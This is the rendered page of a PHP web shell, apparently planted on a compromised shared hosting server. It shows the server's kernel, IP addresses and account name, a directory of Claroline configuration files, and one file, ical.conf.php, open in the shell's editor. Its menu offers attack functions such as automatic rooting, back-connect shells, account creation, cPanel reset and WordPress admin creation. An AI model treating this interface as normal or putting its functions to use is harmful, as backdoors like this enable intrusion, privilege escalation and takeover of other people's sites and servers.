Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
var /
softaculous /
claro /
platform /
conf /
[ HOME SHELL ]
Name
Size
Permission
Action
CLANN.conf.php
466
B
-rw-r--r--
CLCHAT.conf.php
1.06
KB
-rw-r--r--
CLDOC.conf.php
1.91
KB
-rw-r--r--
CLDSC.conf.php
523
B
-rw-r--r--
CLFRM.conf.php
1.04
KB
-rw-r--r--
CLGRP.conf.php
939
B
-rw-r--r--
CLHOME.conf.php
1.08
KB
-rw-r--r--
CLKCACHE.conf.php
621
B
-rw-r--r--
CLLNP.conf.php
1.5
KB
-rw-r--r--
CLMSG.conf.php
660
B
-rw-r--r--
CLQWZ.conf.php
916
B
-rw-r--r--
CLUSR.conf.php
2.22
KB
-rw-r--r--
CLWIKI.conf.php
580
B
-rw-r--r--
CLWRK.conf.php
2.3
KB
-rw-r--r--
auth.cas.conf.php
1.01
KB
-rw-r--r--
auth.extra.conf.php
1.74
KB
-rw-r--r--
auth.sso.conf.php
1.72
KB
-rw-r--r--
claro_main.conf.php
11.67
KB
-rw-r--r--
course_main.conf.php
3.68
KB
-rw-r--r--
ical.conf.php
1.35
KB
-rw-r--r--
rss.conf.php
884
B
-rw-r--r--
user_profile.conf.php
1.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ical.conf.php
<?php /** * DONT EDIT THIS FILE - NE MODIFIEZ PAS CE FICHIER * ------------------------------------------------- * Generated by [[generator]] * Date [[date_at]] * ------------------------------------------------- * DONT EDIT THIS FILE - NE MODIFIEZ PAS CE FICHIER **/ // $CLICALGenDate is an internal mark $CLICALGenDate = "[[timestamp]]"; /* enableICalInCourse : Enable iCal in course */ $GLOBALS['enableICalInCourse'] = TRUE; /* iCalRepositoryCache : Note : this repository should be protected with a .htaccess or be placed outside the web. Because there contain data of private courses. */ $GLOBALS['iCalRepositoryCache'] = 'tmp/cache/ical/'; /* iCalUseCache : Enabling the cache may increase performance */ $GLOBALS['iCalUseCache'] = TRUE; /* iCalGenStandard : When iCal File is regenerated, make the ics version. */ $GLOBALS['iCalGenStandard'] = TRUE; /* iCalGenXml : When iCal File is regenerated, make the xml version. */ $GLOBALS['iCalGenXml'] = TRUE; /* iCalGenRdf : When iCal File is regenerated, make the RDF version. */ $GLOBALS['iCalGenRdf'] = FALSE; /* defaultEventDuration : In iCal an event has a duration but not in claroline. 3600 seconds = 1 Hour. */ $GLOBALS['defaultEventDuration'] = 3600; /* iCalCacheLifeTime : Time before really compute data. 86400 seconds = 1 day. */ $GLOBALS['iCalCacheLifeTime'] = 86400; ?>
Close